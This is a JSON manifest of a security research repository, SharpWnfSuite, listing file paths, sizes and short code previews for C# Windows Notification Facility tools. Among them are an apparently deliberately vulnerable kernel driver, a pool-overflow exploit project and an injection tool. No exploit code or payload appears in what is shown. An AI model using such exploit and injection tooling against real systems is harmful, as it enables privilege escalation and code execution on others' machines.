"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "KernelPrimitive/PoolVulnDrv/PoolVulnDrv.sln",
"chars": 2745,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3182"
},
{
"path": "KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".N"
},
{
"path": "KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/Properties/AssemblyInfo.cs",
"chars": 1398,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/WnfPoolOverflow.cs",
"chars": 48031,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\n\nnamespace WnfPoolOverflow\n{\n class WnfPoolOv"
},
{
"path": "KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow/WnfPoolOverflow.csproj",
"chars": 2336,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "KernelPrimitive/WnfPoolOverflow/WnfPoolOverflow.sln",
"chars": 1124,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3182"
},
{
"path": "LICENSE",
"chars": 1518,
"preview": "BSD 3-Clause License\n\nCopyright (c) 2021, daem0nc0re\nAll rights reserved.\n\nRedistribution and use in source and binary f"
},
{
"path": "README.md",
"chars": 29646,
"preview": "# SharpWnfSuite\n\nThis is the repository for Windows Notification Facility (WNF) tools.\nCurrently, a C# port of the tools"
},
{
"path": "SharpWnfSuite/SharpWnfClient/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".NET"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Handler/CommandLineParser.cs",
"chars": 15521,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Text;\n\nnamespace SharpWnfClient.Handler\n{\n internal cla"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Handler/Execute.cs",
"chars": 546,
"preview": "using SharpWnfClient.Library;\n\nnamespace SharpWnfClient.Handler\n{\n internal class Execute\n {\n public stati"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/NativeMethods.cs",
"chars": 2719,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfClient.Interop\n{\n using NTSTATUS = Int32;\n\n "
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1507.cs",
"chars": 13417,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1507 : ulong\n {\n WNF_BRU_BACKUP = 0x"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1511.cs",
"chars": 37107,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1511 : ulong\n {\n WNF_BI_BI_READY = 0"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1607.cs",
"chars": 47112,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1607 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1703.cs",
"chars": 54946,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1703 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1709.cs",
"chars": 61985,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1709 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1803.cs",
"chars": 69122,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1803 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1809.cs",
"chars": 73166,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1809 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1903To1909.cs",
"chars": 77232,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong\n {\n WNF_A2A_APP"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName2004To21H1.cs",
"chars": 82064,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong\n {\n WNF_9P_REDI"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName2022.cs",
"chars": 86966,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2022 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName21H2.cs",
"chars": 88852,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName22H2.cs",
"chars": 92111,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName23H2.cs",
"chars": 94515,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName24H2.cs",
"chars": 97458,
"preview": "namespace SharpWnfClient.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/Win32Consts.cs",
"chars": 354,
"preview": "using System;\n\nnamespace SharpWnfClient.Interop\n{\n using NTSTATUS = Int32;\n\n internal class Win32Consts\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/Win32Enums.cs",
"chars": 4954,
"preview": "using System;\n\nnamespace SharpWnfClient.Interop\n{\n [Flags]\n internal enum ACCESS_MASK : uint\n {\n // For"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Interop/Win32Structs.cs",
"chars": 8535,
"preview": "using System;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace SharpWnfClient.Interop\n{\n [StructL"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Library/HexDump.cs",
"chars": 4135,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfClient.Library\n{\n internal"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Library/WnfCom.cs",
"chars": 22880,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\nusing SharpWnfClient.Interop;\nusing System.Colle"
},
{
"path": "SharpWnfSuite/SharpWnfClient/Properties/AssemblyInfo.cs",
"chars": 1396,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpWnfSuite/SharpWnfClient/SharpWnfClient.cs",
"chars": 885,
"preview": "using System;\nusing SharpWnfClient.Handler;\n\nnamespace SharpWnfClient\n{\n internal class SharpWnfClient\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfClient/SharpWnfClient.csproj",
"chars": 3611,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpWnfSuite/SharpWnfDump/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".NET"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Handler/CommandLineParser.cs",
"chars": 15519,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Text;\n\nnamespace SharpWnfDump.Handler\n{\n internal class"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Handler/Execute.cs",
"chars": 3805,
"preview": "using System;\nusing SharpWnfDump.Library;\n\nnamespace SharpWnfDump.Handler\n{\n internal class Execute\n {\n pu"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/NativeMethods.cs",
"chars": 2940,
"preview": "using System;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace SharpWnfDump.Interop\n{\n using NTST"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1507.cs",
"chars": 13415,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1507 : ulong\n {\n WNF_BRU_BACKUP = 0x41"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1511.cs",
"chars": 37105,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1511 : ulong\n {\n WNF_BI_BI_READY = 0x4"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1607.cs",
"chars": 47110,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1607 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1703.cs",
"chars": 54944,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1703 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1709.cs",
"chars": 61983,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1709 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1803.cs",
"chars": 69120,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1803 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1809.cs",
"chars": 73164,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1809 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName1903To1909.cs",
"chars": 77230,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong\n {\n WNF_A2A_APPUR"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName2004To21H1.cs",
"chars": 82062,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong\n {\n WNF_9P_REDIRE"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName2022.cs",
"chars": 86964,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2022 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName21H2.cs",
"chars": 88850,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName22H2.cs",
"chars": 92109,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName23H2.cs",
"chars": 94513,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/WellKnownStateName24H2.cs",
"chars": 97456,
"preview": "namespace SharpWnfDump.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/Win32Consts.cs",
"chars": 621,
"preview": "using System;\n\nnamespace SharpWnfDump.Interop\n{\n using NTSTATUS = Int32;\n\n internal class Win32Consts\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/Win32Enums.cs",
"chars": 3260,
"preview": "using System;\n\nnamespace SharpWnfDump.Interop\n{\n [Flags]\n internal enum ACCESS_MASK : uint\n {\n NO_ACCES"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Interop/Win32Structs.cs",
"chars": 6678,
"preview": "using System;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace SharpWnfDump.Interop\n{\n [StructLay"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Library/Globals.cs",
"chars": 1332,
"preview": "using System;\n\nnamespace SharpWnfDump.Library\n{\n internal class Globals\n {\n public static string[] Lifetim"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Library/Helpers.cs",
"chars": 20794,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing SharpWnf"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Library/HexDump.cs",
"chars": 4145,
"preview": "using System;\nusing System.Text;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfDump.Library\n{\n internal c"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Library/Modules.cs",
"chars": 12727,
"preview": "using System;\nusing System.IO;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing SharpWnfDump.Interop;\n\nna"
},
{
"path": "SharpWnfSuite/SharpWnfDump/Properties/AssemblyInfo.cs",
"chars": 1392,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpWnfSuite/SharpWnfDump/SharpWnfDump.cs",
"chars": 1985,
"preview": "using System;\nusing SharpWnfDump.Handler;\nusing SharpWnfDump.Interop;\nusing System.Runtime.InteropServices;\n\nnamespace "
},
{
"path": "SharpWnfSuite/SharpWnfDump/SharpWnfDump.csproj",
"chars": 3696,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpWnfSuite/SharpWnfInject/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".NET"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Handler/CommandLineParser.cs",
"chars": 15521,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Text;\n\nnamespace SharpWnfInject.Handler\n{\n internal cla"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Handler/Execute.cs",
"chars": 2508,
"preview": "using System;\nusing System.Text.RegularExpressions;\nusing SharpWnfInject.Library;\n\nnamespace SharpWnfInject.Handler\n{\n "
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/NativeMethods.cs",
"chars": 5396,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfInject.Interop\n{\n using NTSTATUS = Int32;\n "
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1507.cs",
"chars": 13417,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1507 : ulong\n {\n WNF_BRU_BACKUP = 0x"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1511.cs",
"chars": 37107,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1511 : ulong\n {\n WNF_BI_BI_READY = 0"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1607.cs",
"chars": 47112,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1607 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1703.cs",
"chars": 54946,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1703 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1709.cs",
"chars": 61985,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1709 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1803.cs",
"chars": 69122,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1803 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1809.cs",
"chars": 73166,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1809 : ulong\n {\n WNF_A2A_APPURIHANDL"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName1903To1909.cs",
"chars": 77232,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong\n {\n WNF_A2A_APP"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName2004To21H1.cs",
"chars": 82064,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong\n {\n WNF_9P_REDI"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName2022.cs",
"chars": 86966,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2022 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName21H2.cs",
"chars": 88852,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName22H2.cs",
"chars": 92111,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName23H2.cs",
"chars": 94515,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/WellKnownStateName24H2.cs",
"chars": 97458,
"preview": "namespace SharpWnfInject.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong\n {\n WNF_9P_REDIRECTOR_S"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/Win32Consts.cs",
"chars": 1095,
"preview": "using System;\n\nnamespace SharpWnfInject.Interop\n{\n using NTSTATUS = Int32;\n\n internal class Win32Consts\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/Win32Delegates.cs",
"chars": 475,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfInject.Interop\n{\n internal class Win32Delegat"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/Win32Enums.cs",
"chars": 17795,
"preview": "using System;\n\nnamespace SharpWnfInject.Interop\n{\n [Flags]\n internal enum ACCESS_MASK : uint\n {\n // For"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Interop/Win32Structs.cs",
"chars": 20247,
"preview": "using System;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace SharpWnfInject.Interop\n{\n using NT"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Library/Globals.cs",
"chars": 1078,
"preview": "namespace SharpWnfInject.Library\n{\n internal class Globals\n {\n public static int MajorVersion { get; } = 0"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Library/Helpers.cs",
"chars": 38361,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Runtime.InteropServices;\nusing System.Tex"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Library/Modules.cs",
"chars": 12724,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Linq;\nusing System.Runtime.InteropService"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Library/Utilities.cs",
"chars": 26681,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Runtime.InteropServices;\nusing System.Security.Principal;\n"
},
{
"path": "SharpWnfSuite/SharpWnfInject/Properties/AssemblyInfo.cs",
"chars": 1396,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpWnfSuite/SharpWnfInject/SharpWnfInject.cs",
"chars": 1337,
"preview": "using System;\nusing SharpWnfInject.Handler;\n\nnamespace SharpWnfInject\n{\n internal class SharpWnfInject\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfInject/SharpWnfInject.csproj",
"chars": 3756,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".NET"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/Handler/CommandLineParser.cs",
"chars": 15525,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Text;\n\nnamespace SharpWnfNameDumper.Handler\n{\n internal"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/Handler/Execute.cs",
"chars": 3209,
"preview": "using System;\nusing System.Collections.Generic;\nusing SharpWnfNameDumper.Library;\n\nnamespace SharpWnfNameDumper.Handler"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/Library/Header.cs",
"chars": 5666,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfNameDumper.Library\n{\n [Flags]\n public enum"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/Library/Helpers.cs",
"chars": 9545,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Runtime.InteropServices;\nusing System.Text;\n\nnamespace Sha"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/Library/Modules.cs",
"chars": 11347,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Linq;\nusing System.Runtime.InteropService"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/Properties/AssemblyInfo.cs",
"chars": 1404,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/SharpWnfNameDumper.cs",
"chars": 1712,
"preview": "using System;\nusing SharpWnfNameDumper.Handler;\n\nnamespace SharpWnfNameDumper\n{\n internal class SharpWnfNameDumper\n "
},
{
"path": "SharpWnfSuite/SharpWnfNameDumper/SharpWnfNameDumper.csproj",
"chars": 2618,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpWnfSuite/SharpWnfScan/App.config",
"chars": 180,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n <supportedRuntime version=\"v4.0\" sku=\".NET"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Handler/CommandLineParser.cs",
"chars": 15519,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Text;\n\nnamespace SharpWnfScan.Handler\n{\n internal class"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Handler/Execute.cs",
"chars": 3788,
"preview": "using System;\nusing System.Text;\nusing System.Text.RegularExpressions;\nusing SharpWnfScan.Library;\n\nnamespace SharpWnfS"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/NativeMethods.cs",
"chars": 3756,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfScan.Interop\n{\n using NTSTATUS = Int32;\n u"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1507.cs",
"chars": 13415,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1507 : ulong\n {\n WNF_BRU_BACKUP = 0x41"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1511.cs",
"chars": 37105,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1511 : ulong\n {\n WNF_BI_BI_READY = 0x4"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1607.cs",
"chars": 47110,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1607 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1703.cs",
"chars": 54944,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1703 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1709.cs",
"chars": 61983,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1709 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1803.cs",
"chars": 69120,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1803 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1809.cs",
"chars": 73164,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1809 : ulong\n {\n WNF_A2A_APPURIHANDLER"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName1903To1909.cs",
"chars": 77230,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_1903_TO_1909 : ulong\n {\n WNF_A2A_APPUR"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName2004To21H1.cs",
"chars": 82062,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2004_TO_21H1 : ulong\n {\n WNF_9P_REDIRE"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName2022.cs",
"chars": 86964,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_2022 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName21H2.cs",
"chars": 88850,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_21H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName22H2.cs",
"chars": 92109,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_22H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName23H2.cs",
"chars": 94513,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_23H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/WellKnownStateName24H2.cs",
"chars": 97456,
"preview": "namespace SharpWnfScan.Interop\n{\n internal enum WELL_KNOWN_WNF_NAME_24H2 : ulong\n {\n WNF_9P_REDIRECTOR_STA"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/Win32Consts.cs",
"chars": 1036,
"preview": "using System;\n\nnamespace SharpWnfScan.Interop\n{\n using NTSTATUS = Int32;\n\n internal class Win32Consts\n {\n "
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/Win32Delegates.cs",
"chars": 473,
"preview": "using System;\nusing System.Runtime.InteropServices;\n\nnamespace SharpWnfScan.Interop\n{\n internal class Win32Delegates"
},
{
"path": "SharpWnfSuite/SharpWnfScan/Interop/Win32Enums.cs",
"chars": 17314,
